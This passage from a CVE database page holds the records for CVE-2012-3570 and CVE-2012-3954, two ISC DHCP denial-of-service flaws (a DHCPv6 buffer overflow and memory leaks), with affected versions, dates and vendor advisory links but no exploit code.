              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-07-24T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-11-25T19:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "openSUSE-SU-2012:1006",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
        },
        {
          "name": "MDVSA-2012:115",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00714"
        },
        {
          "name": "54665",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/54665"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3570",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in ISC DHCP 4.2.x before 4.2.4-P1, when DHCPv6 mode is enabled, allows remote attackers to cause a denial of service (segmentation fault and daemon exit) via a crafted client identifier parameter."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "openSUSE-SU-2012:1006",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
            },
            {
              "name": "MDVSA-2012:115",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            },
            {
              "name": "https://kb.isc.org/article/AA-00714",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00714"
            },
            {
              "name": "54665",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/54665"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3570",
    "datePublished": "2012-07-25T10:00:00.000Z",
    "dateReserved": "2012-06-14T00:00:00.000Z",
    "dateUpdated": "2024-08-06T20:13:50.567Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-3954 (GCVE-0-2012-3954)

Vulnerability from cvelistv5 – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:21
Summary
Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://www.securitytracker.com/id?1027300 vdb-entry, x_refsource_SECTRACK
http://www.debian.org/security/2012/dsa-2516 vendor-advisory, x_refsource_DEBIAN
http://rhn.redhat.com/errata/RHSA-2012-1141.html vendor-advisory, x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=… vendor-advisory, x_refsource_MANDRIVA
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://www.mandriva.com/security/advisories?name=… vendor-advisory, x_refsource_MANDRIVA
http://www.debian.org/security/2012/dsa-2519 vendor-advisory, x_refsource_DEBIAN
http://www.ubuntu.com/usn/USN-1519-1 vendor-advisory, x_refsource_UBUNTU
https://kb.isc.org/article/AA-00737 x_refsource_CONFIRM
http://security.gentoo.org/glsa/glsa-201301-06.xml vendor-advisory, x_refsource_GENTOO
http://www.securityfocus.com/bid/54665 vdb-entry, x_refsource_BID
Date Public
2012-07-24 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:21:04.079Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1027300",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1027300"
          },
          {
            "name": "DSA-2516",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2516"
          },
          {
            "name": "RHSA-2012:1141",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
          },
          {
            "name": "MDVSA-2012:116",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
          },
          {
            "name": "openSUSE-SU-2012:1006",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
          },
          {
            "name": "MDVSA-2012:115",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
          },
          {
            "name": "DSA-2519",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2519"
          },
          {
            "name": "USN-1519-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-1519-1"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00737"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          },
          {
            "name": "54665",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/54665"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-07-24T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-11-25T19:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1027300",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1027300"
        },
        {
          "name": "DSA-2516",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2516"
        },
        {
          "name": "RHSA-2012:1141",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
        },
        {
          "name": "MDVSA-2012:116",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
        },
        {
          "name": "openSUSE-SU-2012:1006",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
        },
        {
          "name": "MDVSA-2012:115",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
        },
        {
          "name": "DSA-2519",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2519"
        },
        {
          "name": "USN-1519-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-1519-1"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00737"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        },
        {
          "name": "54665",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/54665"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3954",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1027300",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1027300"
            },
            {
              "name": "DSA-2516",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2516"
            },
            {
              "name": "RHSA-2012:1141",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
            },
            {
              "name": "MDVSA-2012:116",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
            },
            {
              "name": "openSUSE-SU-2012:1006",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
            },
            {
              "name": "MDVSA-2012:115",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
            },
            {
              "name": "DSA-2519",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2519"
            },
            {
              "name": "USN-1519-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-1519-1"
            },
            {
              "name": "https://kb.isc.org/article/AA-00737",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00737"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            },
            {
              "name": "54665",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/54665"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3954",
    "datePublished": "2012-07-25T10:00:00.000Z",
    "dateReserved": "2012-07-11T00:00:00.000Z",
    "dateUpdated": "2024-08-06T20:21:04.079Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}